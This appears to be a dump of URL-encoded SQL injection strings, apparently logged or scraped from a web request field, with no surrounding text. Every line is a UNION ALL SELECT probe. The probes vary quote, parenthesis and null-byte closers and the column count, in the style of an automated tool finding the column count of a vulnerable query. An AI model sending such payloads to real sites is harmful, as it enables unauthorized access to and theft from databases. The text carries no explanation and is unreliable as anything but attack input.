-6896%22%29%29%29%20UNION%20ALL%20SELECT%205213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213--%20 -4856%22%29%29%29%20UNION%20ALL%20SELECT%208464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464%2C8464--%20 -5000%22%29%29%29%20UNION%20ALL%20SELECT%201750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750%2C1750--%20 -8531%22%29%29%29%20UNION%20ALL%20SELECT%204443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443%2C4443--%20 -1698%22%29%29%29%20UNION%20ALL%20SELECT%202980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980%2C2980--%20 -7345%22%29%29%29%20UNION%20ALL%20SELECT%207360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360%2C7360--%20 -1838%22%29%29%29%20UNION%20ALL%20SELECT%207650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650%2C7650--%20 -7078%22%29%29%29%20UNION%20ALL%20SELECT%209572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572--%20 -7005%22%20UNION%20ALL%20SELECT%201988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988--%20 -4203%22%20UNION%20ALL%20SELECT%204982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982--%20 -4296%22%20UNION%20ALL%20SELECT%202404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404--%20 -7508%22%20UNION%20ALL%20SELECT%207314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314%2C7314--%20 -5284%22%20UNION%20ALL%20SELECT%202184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184--%20 -7200%22%20UNION%20ALL%20SELECT%209181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181--%20 -5796%22%20UNION%20ALL%20SELECT%204800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800--%20 -2121%22%20UNION%20ALL%20SELECT%202727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727--%20 -2657%22%20UNION%20ALL%20SELECT%205741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741--%20 -8754%22%20UNION%20ALL%20SELECT%202361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361%2C2361--%20 -7704%22%29%20UNION%20ALL%20SELECT%202328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328--%20 -3377%22%29%20UNION%20ALL%20SELECT%202542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542--%20 -8082%22%29%20UNION%20ALL%20SELECT%206639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639--%20 -9745%22%29%20UNION%20ALL%20SELECT%201655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655%2C1655--%20 -4037%22%29%20UNION%20ALL%20SELECT%202726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726--%20 -1233%22%29%20UNION%20ALL%20SELECT%203564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564%2C3564--%20 -3714%22%29%20UNION%20ALL%20SELECT%201744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744%2C1744--%20 -8719%22%29%20UNION%20ALL%20SELECT%201277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277%2C1277--%20 -3357%22%29%20UNION%20ALL%20SELECT%204576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576--%20 -3082%22%29%20UNION%20ALL%20SELECT%208467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467%2C8467--%20 -7586%22%29%29%20UNION%20ALL%20SELECT%205469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469--%20 -9884%22%29%29%20UNION%20ALL%20SELECT%204792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792%2C4792--%20 -4131%22%29%29%20UNION%20ALL%20SELECT%202199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199--%20 -3912%22%29%29%20UNION%20ALL%20SELECT%205775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775--%20 -4504%22%29%29%20UNION%20ALL%20SELECT%207447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447%2C7447--%20 -9050%22%29%29%20UNION%20ALL%20SELECT%202730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730%2C2730--%20 -1404%22%29%29%20UNION%20ALL%20SELECT%201819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819%2C1819--%20 -8461%22%29%29%20UNION%20ALL%20SELECT%203172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172--%20 -1010%22%29%29%20UNION%20ALL%20SELECT%201467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467--%20 -7558%22%29%29%20UNION%20ALL%20SELECT%203216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216--%20 -8390%22%29%29%29%20UNION%20ALL%20SELECT%203061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061%2C3061--%20 -9610%22%29%29%29%20UNION%20ALL%20SELECT%206137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137%2C6137--%20 -1148%22%29%29%29%20UNION%20ALL%20SELECT%208156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156%2C8156--%20 -6060%22%29%29%29%20UNION%20ALL%20SELECT%202954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954%2C2954--%20 -2838%22%29%29%29%20UNION%20ALL%20SELECT%208244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244--%20 -2278%22%29%29%29%20UNION%20ALL%20SELECT%201624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624--%20 -6428%22%29%29%29%20UNION%20ALL%20SELECT%203667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667--%20 -4845%22%29%29%29%20UNION%20ALL%20SELECT%209321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321--%20 -4889%22%29%29%29%20UNION%20ALL%20SELECT%203270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270%2C3270--%20 -7221%22%29%29%29%20UNION%20ALL%20SELECT%202769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769--%20 -2485%22%20UNION%20ALL%20SELECT%202772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772--%20 -7550%22%20UNION%20ALL%20SELECT%209210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210--%20 -4415%22%20UNION%20ALL%20SELECT%201326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326%2C1326--%20 -7677%22%20UNION%20ALL%20SELECT%201223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223--%20 -4554%22%20UNION%20ALL%20SELECT%206929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929--%20 -6701%22%20UNION%20ALL%20SELECT%201270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270--%20 -7528%22%20UNION%20ALL%20SELECT%205321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321--%20 -3275%22%20UNION%20ALL%20SELECT%204618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618--%20 -5337%22%20UNION%20ALL%20SELECT%202379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379--%20 -6785%22%20UNION%20ALL%20SELECT%208073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073--%20 -4132%25%27%29%20UNION%20ALL%20SELECT%202939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939--%20 -6646%25%27%29%20UNION%20ALL%20SELECT%205048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048%2C5048--%20 -1984%25%27%29%20UNION%20ALL%20SELECT%204185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185--%20 -8933%25%27%29%20UNION%20ALL%20SELECT%206711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711%2C6711--%20 -4625%25%27%29%20UNION%20ALL%20SELECT%208722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722--%20 -7011%25%27%29%20UNION%20ALL%20SELECT%207675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675--%20 -4799%25%27%29%20UNION%20ALL%20SELECT%203919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919--%20 -5797%25%27%29%20UNION%20ALL%20SELECT%209225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225%2C9225--%20 -5027%25%27%29%20UNION%20ALL%20SELECT%209450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450--%20 -3796%25%27%29%20UNION%20ALL%20SELECT%208621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621--%20 -7897%25%27%29%29%20UNION%20ALL%20SELECT%208234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234--%20 -7201%25%27%29%29%20UNION%20ALL%20SELECT%202776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776--%20 -7532%25%27%29%29%20UNION%20ALL%20SELECT%205112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112%2C5112--%20 -9156%25%27%29%29%20UNION%20ALL%20SELECT%202765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765%2C2765--%20 -3334%25%27%29%29%20UNION%20ALL%20SELECT%201995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995--%20 -9044%25%27%29%29%20UNION%20ALL%20SELECT%204626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626--%20 -9826%25%27%29%29%20UNION%20ALL%20SELECT%205129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129--%20 -8857%25%27%29%29%20UNION%20ALL%20SELECT%203857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857%2C3857--%20 -3889%25%27%29%29%20UNION%20ALL%20SELECT%201049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049--%20 -5322%25%27%29%29%20UNION%20ALL%20SELECT%204211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211%2C4211--%20 -5884%25%27%29%29%29%20UNION%20ALL%20SELECT%206425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425--%20 -4405%25%27%29%29%29%20UNION%20ALL%20SELECT%202758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758%2C2758--%20 -4213%25%27%29%29%29%20UNION%20ALL%20SELECT%204289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289%2C4289--%20 -8692%25%27%29%29%29%20UNION%20ALL%20SELECT%203783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783--%20 -1041%25%27%29%29%29%20UNION%20ALL%20SELECT%207034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034%2C7034--%20 -1408%25%27%29%29%29%20UNION%20ALL%20SELECT%203999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999%2C3999--%20 -7960%25%27%29%29%29%20UNION%20ALL%20SELECT%203875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875%2C3875--%20 -8404%25%27%29%29%29%20UNION%20ALL%20SELECT%203070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070%2C3070--%20 -2204%25%27%29%29%29%20UNION%20ALL%20SELECT%207758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758%2C7758--%20 -4763%25%27%29%29%29%20UNION%20ALL%20SELECT%205283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283--%20 -5338%25%27%20UNION%20ALL%20SELECT%204863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863--%20 -9188%25%27%20UNION%20ALL%20SELECT%202081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081%2C2081--%20 -5106%25%27%20UNION%20ALL%20SELECT%206605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605%2C6605--%20 -3984%25%27%20UNION%20ALL%20SELECT%204691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691--%20 -3393%25%27%20UNION%20ALL%20SELECT%206052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052--%20 -4114%25%27%20UNION%20ALL%20SELECT%201927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927--%20 -8353%25%27%20UNION%20ALL%20SELECT%207232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232--%20 -5264%25%27%20UNION%20ALL%20SELECT%205704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704%2C5704--%20 -1584%25%27%20UNION%20ALL%20SELECT%202526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526--%20 -9094%25%27%20UNION%20ALL%20SELECT%203702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702%2C3702--%20 -9092%00%27%29%20UNION%20ALL%20SELECT%209243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243--%20 -3588%00%27%29%20UNION%20ALL%20SELECT%202842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842--%20 -8149%00%27%29%20UNION%20ALL%20SELECT%208234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234--%20 -2215%00%27%29%20UNION%20ALL%20SELECT%209461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461--%20 -7064%00%27%29%20UNION%20ALL%20SELECT%206462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462--%20 -4567%00%27%29%20UNION%20ALL%20SELECT%204720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720--%20 -4413%00%27%29%20UNION%20ALL%20SELECT%203974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974%2C3974--%20 -2867%00%27%29%20UNION%20ALL%20SELECT%205730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730%2C5730--%20 -2839%00%27%29%20UNION%20ALL%20SELECT%204268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268--%20 -6063%00%27%29%20UNION%20ALL%20SELECT%205746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746--%20 -6546%00%27%20UNION%20ALL%20SELECT%209022%2C9022%2C9022%2C9022%2C9022%2C9022%2C9022%2C9022%2C9022%2C9022%2C9022--%20 -8555%00%27%20UNION%20ALL%20SELECT%203829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829--%20 -3432%00%27%20UNION%20ALL%20SELECT%205761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761--%20 -1960%00%27%20UNION%20ALL%20SELECT%209209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209--%20 -1362%00%27%20UNION%20ALL%20SELECT%201776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776%2C1776--%20 -6530%00%27%20UNION%20ALL%20SELECT%205989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989%2C5989--%20 -9003%00%27%20UNION%20ALL%20SELECT%205283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283--%20 -3909%00%27%20UNION%20ALL%20SELECT%204592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592--%20 -9828%00%27%20UNION%20ALL%20SELECT%207160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160%2C7160--%20 -9636%00%27%20UNION%20ALL%20SELECT%201525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525--%20 -1527%27%29%20WHERE%205971%3D5971%20UNION%20ALL%20SELECT%205971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971--%20 -6846%27%29%20WHERE%203972%3D3972%20UNION%20ALL%20SELECT%203972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972%2C3972--%20 -1539%27%29%20WHERE%205160%3D5160%20UNION%20ALL%20SELECT%205160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160%2C5160--%20 -8461%27%29%20WHERE%204147%3D4147%20UNION%20ALL%20SELECT%204147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147--%20 -9068%27%29%20WHERE%206802%3D6802%20UNION%20ALL%20SELECT%206802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802--%20 -6642%27%29%20WHERE%202368%3D2368%20UNION%20ALL%20SELECT%202368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368%2C2368--%20 -1269%27%29%20WHERE%207495%3D7495%20UNION%20ALL%20SELECT%207495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495--%20 -4919%27%29%20WHERE%207891%3D7891%20UNION%20ALL%20SELECT%207891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891--%20 -3848%27%29%20WHERE%202223%3D2223%20UNION%20ALL%20SELECT%202223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223%2C2223--%20 -6510%27%29%20WHERE%208845%3D8845%20UNION%20ALL%20SELECT%208845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845%2C8845--%20 -2411%22%29%20WHERE%208592%3D8592%20UNION%20ALL%20SELECT%208592%2C8592%2C8592%2C8592%2C8592%2C8592%2C8592%2C8592%2C8592%2C8592%2C8592--%20 -3999%22%29%20WHERE%206343%3D6343%20UNION%20ALL%20SELECT%206343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343--%20 -7360%22%29%20WHERE%204678%3D4678%20UNION%20ALL%20SELECT%204678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678--%20 -1644%22%29%20WHERE%205723%3D5723%20UNION%20ALL%20SELECT%205723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723--%20 -2469%22%29%20WHERE%207544%3D7544%20UNION%20ALL%20SELECT%207544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544--%20 -4273%22%29%20WHERE%204668%3D4668%20UNION%20ALL%20SELECT%204668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668--%20 -3515%22%29%20WHERE%203229%3D3229%20UNION%20ALL%20SELECT%203229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229--%20 -8789%22%29%20WHERE%201746%3D1746%20UNION%20ALL%20SELECT%201746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746%2C1746--%20 -1846%22%29%20WHERE%202587%3D2587%20UNION%20ALL%20SELECT%202587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587--%20 -8063%22%29%20WHERE%205140%3D5140%20UNION%20ALL%20SELECT%205140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140%2C5140--%20 -6789%29%20WHERE%208925%3D8925%20UNION%20ALL%20SELECT%208925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925--%20 -3183%29%20WHERE%206651%3D6651%20UNION%20ALL%20SELECT%206651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651%2C6651--%20 -3211%29%20WHERE%206939%3D6939%20UNION%20ALL%20SELECT%206939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939--%20 